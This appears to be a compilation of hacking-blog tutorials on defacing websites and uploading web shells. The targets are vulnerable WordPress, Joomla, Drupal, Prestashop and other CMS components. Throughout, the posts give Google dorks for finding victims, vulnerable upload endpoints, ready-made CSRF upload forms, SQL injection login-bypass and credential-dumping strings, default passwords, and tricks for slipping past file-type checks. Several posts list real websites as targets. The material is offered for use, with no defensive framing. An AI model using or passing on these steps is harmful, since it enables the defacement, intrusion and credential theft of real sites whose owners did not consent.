how to deface Foxy Engineering Manager + shell upload exploit

Today I will post tuturial on how to deface Foxy Engineering Manager + shell upload exploit.

Dork: intitle: "Roxy File Manager"

tutor: Dorking Using Google.com or bing.com

select target, and it will be like http://www.target.sa.nge/themes/
backend/js/fileman/

Now Select 'Add File' and Upload your Shell..

NOTE: Shell Must be 'xxxjpg' extension, example: dabshell.php.xxx.jpg

After your Shell has been uploaded,
Then Click Right Shell => click
Preview

Thats all itz easy mhhhhhhn, Good bye for now...

HOW TO HACK USING HAVIJ

what is havij ??

havij is a web hacking tool that is use to
hack SQLi vulnerable sites and you can
download it from below

DOWNLOAD IT HERE

download and install havij

go to google and search google dorks

open any url and in the end of url type ' and then press enter if you get a sql erroe thats mean the site is vulen for sqli attack

open havij and paste url and click on analyze

it will start searching...

if it show this box then thats it

click on tables button and then click on column like admin and user or login to get info

then if it show username and password click on those column and press get data button. then it shows username and password, thats all...

Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload exploit

Hello fans, here i come with new exploit named "Warehouse - Responsive
Prestashop 1.6 Arbitrary File
Upload"

Dork :
Inurl:/modules/columnadverts/

Inurl:/modules/homepageadvertise/

Inurl:/modules/productpageadverts/

Inurl:/modules/simpleslideshow/

Exploit
http://site.com/modules/columnadverts /uploadimage.php

http://localhost/ modules/homepageadvertise/uploadimage.php

http://site.com/modules/productpageadverts/uploadimage.php

http://site.com/modules/simpleslideshow /uploadimage.php

CSRF :

<form method="POST" action="http:// localhost /modules/ modules name / uploadimage.php" enctype="multipart/form-data"><input type="file" name="userfile" / ><button>Upload</button> </form>

After shell uploading

Then check your uploaded shell like

http://www.site.com/modules/modules name/slides/Shellname.php

Happy hacking...

[PHP] Admin Finder script

[PHP] Admin Finder

Admin finder script it helps in finding admin page with no stress..

DOWNLAOD THE SCRIPT HERE

ADMIN PAGE BYPASS EXPLOIT

|[+] Exploit Title: Admin Page Bypass |[+]

|[+] Exploit Author : #By.SaMiR |[+]

|[+] Google Dork:intext:Developed By :
SAM Softech
|[+]

|[+] Google Dork:"Developed By : SAM
Softech" |[+]

|[+] Tested on: Windows 7 , Mozilla
Firefox , ubuntu
|[+]

|[+] Date: 08/08/2016
|[+]

|--------------------------------------------------------------|

|[+] Exploit :
|[+]

|[+] Username: ' or '1'='1' -- ' ~ ' or '1'='1'

|[+] Password: ' or '1'='1' -- ' ~ ' or '1'='1'
|[+]

|[+] Admin Url :-
|[+]

|[+] http://Site.com/myadmin/index.php |[+]

|--------------------------------------------------------------|

|[+] Demo:-
|[+]

|[+]http://hotelorangeinnpatna.com/myadmin

|[+]http://www.indianacupressure.com/myadmin

HIGH SCHOOL DEFACE EXPLOIT

hello fellas, Lets rock High school Deface exploit is so simple i love the exploit like die...

oya lets move on

Dork: intext:Welcome to our electronic class
yearbook

exploit:
/forum_topic_create.php?forumid=1

fill out the form and upload your .txt deface..

After you've uploaded your file sucessful it will apear in the next page, just click your file name and it'll redirect you to your deface link..

here are some vuln webs

http://www.denfeld65.com

http://www.provinerams1969.net

http://www.denfeld63.com

http://www.lanier57.com

http://dulutheast1965.com

http://www.tulsamemorial64.com

Have some fun with the webs, good bye :D

HOW TO HACK USING DRUPAL EXPLOIT TUTORIAL

Hello guyz...
This time I will explain how to deface a site that uses the Drupal 7.x ..

Prepare the ingredients: 1. Drupal Exploiter DOWNLOAD HERE 2. with your Shell uploader DOWNLOAD HERE..

Steps ------------------- 1. Save tools exploit the above with php extension and save it in your hosting or localhost or upload it in shell...

1. Google dork; intext: "powered by drupal" or inurl: "node / add/article"

2. Enter the target and press the "suck it!" (if successful in appearance like this below)

3. Go to the url http://site.com/user/login

And enter user: fuckyou pass: admin

4. Then go to http://site.com/node/add/ article (insert source of his backdoor and change its format to PHP Code)

then scroll down and click Save

And you will immediately direct to your shell.

thats allhappy hacking :D

ADROID KALI LINUX INSTALLLATION

Install Kali Linux tutorials on
Android..

Andriod kali linux installation
is quit easy and simple, keep calm and watch the above video..

click here and watch it

Exploit Sitefinity CMS Editor Dialogs File Upload Vulnerability

Exploit Tutorial deface with Sitefinity CMS (ASP.NET) Shell Upload Vulnerability..Sitefinity CMS is a bug that exist in CMS WordPress theme..

here we go

dork: inurl:"/Sitefinity/login.aspx

exploit: /sitefinity/UserControls/ Dialogs/DocumentEditorDialog.aspx

Vulnerability ~ Appears in Upload Form like this image

Then upload your shell or your deface page..

If successful uploaded the file name will
appear

Now your Shell/File Access >will be like this www.target.com/Files/file.aspx or www.target.com/Files/file.html e.t.c..

Thats all, happy hacking....

Joomla Brute Force Tutorial

Joomla Brute
Force deface Tutorial..

Dork inurl:"/ templates/beez5/" and
intitle: Index of/administrator /

Download bruteforce tool
HERE

ok Furthermore, if already find any
more targets can be saved in the file listsite.txt and password should be save @listpassword.txt

now open the bruteforce software, then
click Load From File. If so, click Scan

Then stay waiting for the results, it
requires a longer period of time..

After it load succesfull you'll get vuln sites with their username and pass, like the picture below..

now just find admin panel and login...thats All..

Stay_bless and good bye 4 now...

Joomla Component com_jwallpapers Arbitrary File Upload

Hello guys...am goin to share joomla com_jwallpapers Component
Arbitrary File Upload vunlnerability exploit..

Google Dork: inurl:/index.php? option=com_jwallpapers

select one of the web,then enter this exploit: /index.php? option=com_jwallpapers&task=upload

If it vuln u'll see something like ~ { "jsonrpc": "2.0",
"result": null, "id": "en"}

CSRF Xploit Code:

click here and copy

NB: Change parts shell_kalian.php with the name of the shell that you want it (ex:
shell.php), and also shell that you
upload must be -.jpg extension (ex:
shell.jpg). Without having to use tamper
data and so on..

Shell Access:
http://target.com/ jwallpapers_files/plupload/shell_kalian.php

Stil remember that, the shell must be a .jpg extension, and later change the name of your shell e.g kalian.php, like that Kalian wrote on CSRF, extension also be .php....

LOKOMEDIA SQL TUTORIAL

Okay, this time i'm going to share Lokomedia SQL tutorial,
This tutorial is very easy, follow the steps below silently...

dorks:

- Inurl: static-1-pengantar.html

- Inurl: category-23-hiburan.html

- Inurl: things-about-kami.html

- Inurl: static-3-visidanmisi.html

- Inurl: Static-19-beasiswa.html

- Inurl: Static-22-kerjasama.html

Exploit: 'union select / *! 50000Concat
* / (username, 0x20, password) from +
users + - + - +

=================HOW TO USE IT
=====================

Find the target site first, as example, I
use DORK
- static-1-pengantar.html
then search
on GOOGLE , there will be a lot of SITES..
then select any site, Example http:/site.com/statis-1-pengantar.html

then enter this explot /statis--1'union select /*!
50000Concat*/
(username,0x20,password)+from+users-- +--+-pengantar.html

example : http://
site.com/statis--1'union select /*!
50000Concat*/
(username,0x20,password)+from+users-- +--+-pengantar.html

There must be no spaces, or the exploit will
miss, and add (-)
before the figures on its site URL
It will bring out the web username and
password in a new page..

If its use HASH Password, Decrypt the
password in

hashkiller

If the password is found now look for admin login admin login in

-http://site.com/admin

-http://site.com/adminweb

-http://site.com/administrator

-Http://site.com/redaktur

If you successfully login, upload your shell
in photo gallery, or banner if it failed
to upload
favico on the web, Rename your shell to shell.php.JPG
(Adds .jpg format) and then on Tamper Data, can be downloaded in add ons to
the browser
you use..

Then get the shell access by clicking the
right mouse button, then copy and paste
the link address his error photo you
uploaded earlier, to a new url, and Done....

Read about shell uploading using tamper data here

admin default user

Hello everybody. Now I will discuss " Tutorial to deface Admin Default User "I Use This technique Frequently, It Very Easy...
Without wasting of our time lets move straight to the point.

- Dork: inurl:/html/index.php? News site: sch.id

if you need more sitez add this domainz to your dork jg,go.id, ac.id, co.id, id, com, lots more..

Find The target, for example: www.site.com/html/index.php? id=berita

Change it to www.site.com/ admin/

Afterwards enter the UserName and Password, the username and password is= admin
If the Web is Vuln it will Redirect you to admin dashbord... Now do whatever you fell like doing with the web,or you can upload your shell using tamper data....

WORDPRESS THEMES U-DESIGN EXPLOIT

Hello World; this time I'll Share u-design themes exploit in wordpress.

#Type: CSRF & Xampp, Uploadify

#Tested: Windows XP, 7, 8, BackBox

#CMS: WordPress

Dork: inurl:themes/u-design/

exploit:
/wp-content/themes/u-design/scripts/admin/uploadify/
uploadify.php

If Vuln, it will display a "blank" page

CSRF

<form method="POST" action="http://www.site.com/wp-content/themes/u-design/scripts/admin/uploadify/ uploadify.php" enctype="multipart/form-data"><input type="file" name="Filedata" /><button>Upload</button><br /> </form>

Shell Access: site.com/myshell.php

Thats all for now, stay updated always..

WordPress deface Fluid_forms Upload Vulnerability Exploit

Hello Fans,
our today's article will be on WordPress Fluid_forms Upload Vulnerability
Exploit..

#Type: CSRF & Xampp, Uploadify

#Tested: Windows XP, 7, 8, BackBox

#CMS: WordPress

NOW LET MOVE ON

Dork: inurl:fluid_forms or inurl:"/wp-content/plugins/fluid_forms/file-upload/"

Exploit: /wp-content/plugins/fluid_forms/ file upload/server/php/

search the dork in Google, Select a target, then enter Exploit.
example:
site.com/wp-content/plugins/fluid_forms /fileupload/server/php/

If Vuln, it will display "files []"

CSRF

<form method="POST" action="http://www.site.com/wp-content/plugins/ fluid_forms/file-upload/server/php/" enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button><br /> </form>

Replace www.site.com with your
target web, then Save the csrf script as: .html E.G md.html and upload your shell.

Shell Access: /wp-content/plugins/
fluid_forms/file-upload/server/php/
files/shellname.php

thats all, if you dont understand contact me or comment bellow...

HOW TO DEFACE WORDPRESS THEMES QUALIFIRE..

Hi All
, now i will post Wp Qualfire Themes hacking tutorial..

-Dork: inurl:"wp-content/themes/
qualifire

-Exploit : /wp-content/themes/qualifire/
scripts/admin/uploadify/uploadify.php

If it shows blank page that means it Vuln

CSRF

<form method="POST" action="http://www.target.com/wp-content/themes/qualifire/ scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data"><input type="file" name="Filedata" /><button>Upload</button><br /> </form>

if shell succesful upload it will display "1" in a blank page

how to Access your shell: target.com/shellname.php

NOTE: not all webz accept .php file,so if php fails during uploading try jpg,phtml,txt or html

Good_Bye :D

JQUERY SHELL UPLOADING TUTORIAL

salam guyz, here is another wordpress shell uploading tutorial.. "jQuery shell upload vulnrability"
Google Dork: Dork : /assets/global/plugins/jquery-file-upload/ inurl:"assets/global/plugins/jquery-file- upload/"

Vulnerability : http://target.com/assets/global/plugins/jquery-file-upload/server/php/

When Vulnerable : it will show something like "files" in a blank page..

Copy it CSRF code here

<form method="POST" action="http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form> Check your uploaded shell here

Shell Access : target.com/assets/global/ plugins/jquery-file-upload/server/php/ files/shellname.php

Happy defacing....

TAMPER DATA SHELL UPLOADING TUTORIAL

Shell uploading is a Hell like thing for
beginners so here i m writing this tutorial
for beginners to upload shell through
Temper Data adon of Mozilla FireFox.

When to Use Temper Data:

Some websites don't allow uploading files other than images so in such a situation shell uploading is a problem because we can't upload any php or asp shell file.So we can upload shell by tempering HTTP headers.

Requirements:

Mozilla Firef0x

Tampe Data add-on

Temper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Mozilla FireFox: http://www.mozilla.org/en-US/firefox/new/

1. Open Website's Admin Panel...

2. Change Your Shell Extension to .jpeg or .jpg or .gif

3. Now open your Tamper Data And Click on Start Tampering..

4. Now goto Upload 0ption` and upload your Shell As shell.jpg

5. Windows Will Pop-UP. --- Tamper - Submit - Abort REQUEST Click on Tamper At Your Right Side Copy All Text from POST DATA BOX Paste All text in notepad..

6. Now Press CTRL + F, a search
Text field will appear in your firefox browser's lower left..

7. Search For Shell.jpg

8. Edit You Shell Extension to .php then copy it paste it on post data box And Click On Submit...

9. Congrats your shell has been uploaded succesfully.

10. Now in image gallery where you have uploaded shell, u will see many images.Right click on your shell image and click on "copy image location". Now paste this url in your browser bar.Your shell will open up for you.

Why do we need TamperData:

Tamper Data is used to view / modify HTTP/HTTPS headers and post parameters.So with this adon we will trick web application that we are uploading image file i.e. jpg, gif, png etc. but when file will be transferring through HTTP headers, we will change its extension to shell.php and our shell will be uploaded.This is called HTTP headers tempering..

WordPress Smallbiz Themes Remote File Uploads Vulnerability

#- Title: Wordpress Smallbiz Themes
Remote File Uploads Vulnerability

#- Author: FullSecurity.org

#- Date: 09-02-2016

#- Developer : expand2web.com

#- Link Download : www.expand2web.com/smallbiz-
theme/

Google Dork: inurl:"/themes/
smallbiz/"

Vulnerability : site/wp-content/themes/smallbiz/palette/index.php

When Vulnerable :

Method :

1. Go to site.com/wp-content/themes/
smallbiz/palette/index.php

2. Upload your image

3. if succes, click image & open in new
tab..thats all..

Tutorial deface By Com_Smartformer

Salam guys, i wanna share :
" Com_Smartformer deface tutorial"

the exploit is so simple and easy to understand

Now let get down to the busness

Dork: inurl:index,php?Option=
com_smartformer"

start opening the webs, you'll be redirected to registration page, fill out the form corectly.

when filling the form you'll see an upload option, upload your shell there.

after registration, find your uploaded shell here.

www.site.com/components/
com_smartformer/files/yourshellname.php

thats all for now, stay updated for another exploit...

Com_media shell uploading tutorial

Hello fans, how you doing ?? I hope you'r satisfied with the tutors i do posted ??

0k i come with another private shell uploading method, is not too hard you can use even china phones to destroy webs with the exploit.

However, When i said that i do upload shell using com_media exploit, alot of peoples do says i'm lieing or joking and i basically prov them
Wrong.

Alot peoples think maybe i used tamper data to upload it or i get a priv8 hacking softwre that am using loolz..

Huh i'm tired of typing lemme go straight to the point.

first of all rename your shell to this extention: shellname.PhP.txt

-Get a vuln web

-upload your shell

-run your uloaded shell, it'll be like

www.site.com/images/shellname.PhP.txt wait and see the magic!!!

NOTE: not all webz maybe vuln to shell uploading, but be trying them one by one...

Read my first post on com_media here....click here

WORDPRESS FORMCRAFT EXPLOIT

This time I will share WordPress Plugins FormCraft deface tutorial, Follow my steps gradually dont rush..
Requirements:
- Shell
- CSRF script

<form method = "POST" action = "http:// buildfire.com/wp-content/plugins/ formcraft/file-upload/server/php/ upload.php" enctype = "multipart / form-data"> <input type = "file" name = "files []" /> <button> Upload </ button> </ form>

Save the script in HTML extension! example: csrf.html
STEPS
1. Go to www.google.com and paste this dork:
inurl:/wp-content/plugins/formcraft
2. Then select any web
3. And enter the following exploits:
/wp-content/plugins/formcraft/file- upload/server/php/upload.php
E.g site.com/wp-content/plugins/formcraft/file- upload/server/php/upload.php
4. If vuln to our attack, you will see something like this: ( "failed": "No files found") or files []
On a white blank page
5. The next step is to open CSRF script
6. Copy and paste vuln site in CSRF
7. Save it, and then open a shell server and Upload the CRSF script you edited earlier.
8. then run your uploaded script E.G www.site.com/crsf.html
9. A new white blank page will open, upload your own shell there.
10. If shell successful uploaded shell will apear with random simple text: 19860ab123abcd--blabla.php
Lastly Access your shell at http:// www.site.com/wp-content/plugins/ formcraft/fileupload/server/php/files/nameshellrandom.php
wp-content/plugins/ formcraft / sile upload/server/php/ file/ 154897dc834ecb---blabla.php
thats all, i hope you understand the tutor ?? If no you are free to contact the admin.... Good bye!!